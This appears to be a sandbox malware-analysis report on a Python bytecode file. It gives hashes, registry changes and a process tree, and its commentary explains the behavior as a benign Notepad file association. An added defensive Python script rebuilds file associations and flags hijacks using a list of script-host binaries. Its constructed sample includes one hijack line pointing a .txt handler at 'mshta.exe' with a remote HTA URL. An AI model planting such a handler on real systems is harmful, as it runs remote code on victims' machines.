Analysis
-
max time kernel
43s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64 arch:x86 image:win7-20240508-en locale:en-us os:windows7-x64 system -
submitted
19-06-2024 09:04
Behavioral task
behavioral1
Sample
cch_blum_re.pyc
Resource
win7-20240508-en
5 signatures
60 seconds
Behavioral task
behavioral2
Sample
cch_blum_re.pyc
Resource
win10v2004-20240508-en
11 signatures
60 seconds
General
-
Target
cch_blum_re.pyc
-
Size
7KB
-
MD5
b3b9b54ddc84df18135852ee3ede2383
-
SHA1
6841a45353951cbbb8a9bb7a8489a1ab43ce4669
-
SHA256
b8e5ae90d66993923b851d0aeb26c0031b56f46a7151d71a0fee2b77bd9bf691
-
SHA512
86db3c0eba1533bbe3ca62c324106e199756c09aa5477ab90c0711c28cc01fade9f87f89ebba78117102775194b0a197f95f93c95a8e5ec7c3a0295d494dee68
-
SSDEEP
192:8w5Cpjqg1Bo123UpK/PIFwH7GSPFy0xg60GeA:sWmK23UpK/P/bG8aA
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 12 IoCs
Process: rundll32.exe (PID 2696)
- Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit\command
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open
- Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_Classes\Local Settings
- Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\ (empty default value)
- Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc\ = "pyc_auto_file"
- Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit -
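The twelve registry IoCs above are the per-user file association that Windows writes when a handler is chosen in the Open With dialog: the extension key `.pyc` gets the ProgID `pyc_auto_file` as its default value, and that ProgID gets `shell\open\command` and `shell\edit\command` pointing at `NOTEPAD.EXE %1`. The hive path `\REGISTRY\USER\<SID>_CLASSES` is the kernel name for `HKCU\Software\Classes`. The same key shape is what a file-association hijack writes, so it is worth reconstructing the chain mechanically rather than eyeballing it. The script below is an added example, not part of the sandbox report or its tooling: it parses the report's IoC lines (embedded here as a constructed sample), rebuilds extension → ProgID → verb → command, and flags any handler that is a script host or a URL, or that falls outside a caller-supplied allowlist. The last two sample lines (`.txt` → `txt_evil_file` → `mshta.exe …`) are constructed for contrast and do not appear in the report.

```python
"""Rebuild Windows file-association chains from sandbox registry IoCs and flag bad handlers."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the report's "Modifies registry class" IoCs, one per line,
# in the sandbox's '<op> <key>[ = "<value>"]' shape. The final two lines are NOT from
# the report; they are a constructed hijack case so the check has something to flag.
SAMPLE_IOCS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\edit\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\shell\open\command\ = "%SystemRoot%\\system32\\NOTEPAD.EXE %1"
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_Classes\Local Settings
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\pyc_auto_file\
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.pyc\ = "pyc_auto_file"
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.txt\ = "txt_evil_file"
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\txt_evil_file\shell\open\command\ = "mshta.exe http://example.invalid/x.hta"
"""

# \REGISTRY\USER\<SID>_CLASSES\ is the kernel name of HKCU\Software\Classes.
HIVE_RE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-[\d-]+_CLASSES\\", re.IGNORECASE)
# '<op> <key>' with an optional ' = "<value>"' tail; keys may contain spaces.
LINE_RE = re.compile(r'^(Set value \(\w+\)|Key created) (.+?)(?: = "(.*)")?$')

# Binaries that should never be a document's open/edit handler.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def parse_iocs(text: str) -> List[dict]:
    """Parse IoC lines under a per-user Classes hive into {op, key, value} records."""
    entries = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        op, key, value = m.groups()
        rel = HIVE_RE.sub("", key)
        if rel == key:
            continue                      # not under HKCU\Software\Classes; ignore
        rel = rel.rstrip("\\")            # a trailing '\' names the key's default value
        entries.append({"op": op, "key": rel, "value": value})
    return entries


def build_associations(entries: List[dict]) -> Dict[str, dict]:
    """Map extension -> {progid, verbs: {verb: command}} from 'Set value' records."""
    ext_to_progid: Dict[str, str] = {}
    verbs: Dict[str, Dict[str, str]] = {}
    for e in entries:
        if not e["op"].startswith("Set value") or e["value"] is None:
            continue
        parts = e["key"].split("\\")
        if len(parts) == 1 and parts[0].startswith("."):
            ext_to_progid[parts[0].lower()] = e["value"]        # .ext -> ProgID
        elif len(parts) == 4 and parts[1].lower() == "shell" and parts[3].lower() == "command":
            verbs.setdefault(parts[0], {})[parts[2].lower()] = e["value"]  # ProgID\shell\<verb>\command
    return {ext: {"progid": pid, "verbs": verbs.get(pid, {})}
            for ext, pid in ext_to_progid.items()}


def handler_exe(command: str) -> str:
    """Executable basename from a handler template such as '"C:\\x\\y.exe" "%1"'."""
    cmd = command.strip()
    exe = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(" ", 1)[0]
    return exe.replace("/", "\\").split("\\")[-1].lower()


def assess(assoc: Dict[str, dict],
           expected: Optional[set] = None) -> List[Tuple[str, str, str, str]]:
    """Return (ext, verb, exe, reason) for handlers that are script hosts, URLs, or off-allowlist."""
    findings = []
    for ext, info in sorted(assoc.items()):
        for verb, cmd in sorted(info["verbs"].items()):
            exe = handler_exe(cmd)
            if exe in SCRIPT_HOSTS or "://" in cmd:
                findings.append((ext, verb, exe, "script host or URL used as file handler"))
            elif expected is not None and exe not in expected:
                findings.append((ext, verb, exe, "handler outside allowlist"))
    return findings


if __name__ == "__main__":
    chain = build_associations(parse_iocs(SAMPLE_IOCS))
    for ext, info in sorted(chain.items()):
        print(ext, "->", info["progid"], info["verbs"])
    for f in assess(chain, expected={"notepad.exe"}):
        print("FLAG:", f)
```

Against the report's own entries the only chain is `.pyc` → `pyc_auto_file` with `open` and `edit` both resolving to `notepad.exe`, which is exactly what a manual Open With choice produces; only the constructed `.txt` line is flagged.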
Opens file in notepad (likely ransom note) 1 IoCs
Process: NOTEPAD.EXE (PID 2684)
This signature fires on the Notepad launch alone. Here the .pyc had no registered handler, so `cmd /c` handed it to the shell, which displayed the Open With dialog (shell32.dll,OpenAs_RunDLL); Notepad was chosen in that dialog, which is what created the pyc_auto_file association above and opened the file. Nothing in the trace shows a note being written. -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Process: rundll32.exe (PID 2696) -
Suspicious use of WriteProcessMemory 6 IoCs
Processes: cmd.exe, rundll32.exe
- PID 2408 (cmd.exe) wrote to memory of PID 2696 (rundll32.exe), reported 3 times
- PID 2696 (rundll32.exe) wrote to memory of PID 2684 (NOTEPAD.EXE), reported 3 times
In both cases the writer is the parent that has just created the target, which is the ordinary process-creation path; this signature matters only when the target is a process the writer did not spawn.
Processes
-
1. C:\Windows\system32\cmd.exe (PID 2408)
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\rundll32.exe (PID 2696), child of 2408
      Command line: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\NOTEPAD.EXE (PID 2684), child of 2696
         Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cch_blum_re.pyc
         - Opens file in notepad (likely ransom note)